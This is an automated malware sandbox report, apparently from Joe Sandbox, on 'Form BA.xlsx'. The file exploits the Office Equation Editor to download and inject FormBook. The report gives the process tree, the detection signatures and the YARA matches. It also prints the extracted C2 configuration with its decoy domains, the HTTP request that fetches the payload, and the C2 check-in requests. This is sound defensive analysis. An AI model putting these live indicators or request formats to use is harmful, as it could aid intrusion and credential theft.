Windows Analysis Report Form BA.xlsx

Overview

General Information

Sample Name: Form BA.xlsx
Analysis ID: 452641
MD5: f683a8eb2e17866a194af9b23efda095
SHA1: b3002f93d24336a9af003a7a3da36217a7d7b8db
SHA256: e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1700 cmdline: 'C:\Users\Public\vbc.exe' MD5: 734A568749C7879E5CA5EA2B8E082F5E)
      • vbc.exe (PID: 1780 cmdline: C:\Users\Public\vbc.exe MD5: 734A568749C7879E5CA5EA2B8E082F5E)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • rundll32.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • cmd.exe (PID: 1544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
      00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      Exploits:

      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network Connection, Author: Joe Security, Data: DestinationIp: 3.121.113.175, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3024, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3024, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe

      System Summary:

      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
      Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Execution from Suspicious Folder
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Suspicious Process Start Without DLL
      Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
      Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
      Multi AV Scanner detection for submitted file
      Source: Form BA.xlsx, Virustotal: Detection: 31%
      Source: Form BA.xlsx, ReversingLabs: Detection: 30%
      Yara detected FormBook
      Source: Yara match, File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe, Joe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
      Source: 6.2.vbc.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
      Source: 6.2.vbc.exe.8967b0.2.unpack, Avira: Label: TR/ATRAPS.Gen
      Source: 6.3.vbc.exe.8967b0.0.unpack, Avira: Label: TR/ATRAPS.Gen

      Exploits:

      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: global traffic, DNS query: name: www.pon.xyz
      Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
      Source: excel.exe, Memory has grown: Private usage: 4MB later: 69MB

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: www.gaigoilaocai.com/wufn/
      Performs DNS queries to domains with low reputation
      Source: C:\Windows\explorer.exe, DNS query: www.pon.xyz
      Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Thu, 22 Jul 2021 15:14:54 GMT; Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7; Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT; ETag: "ae200-5c7af4c3e3d9d"; Accept-Ranges: bytes; Content-Length: 713216; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
      Source: global traffic, HTTP traffic detected: GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1; Host: www.pon.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1; Host: www.intoxickiss.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
      Source: Joe Sandbox View, IP Address: 199.59.242.153
      Source: global traffic, HTTP traffic detected: GET /www/pool.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 3.121.113.175; Connection: Keep-Alive
      Source: unknown, TCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknown, DNS traffic detected: queries for: www.pon.xyz
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmp, String found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
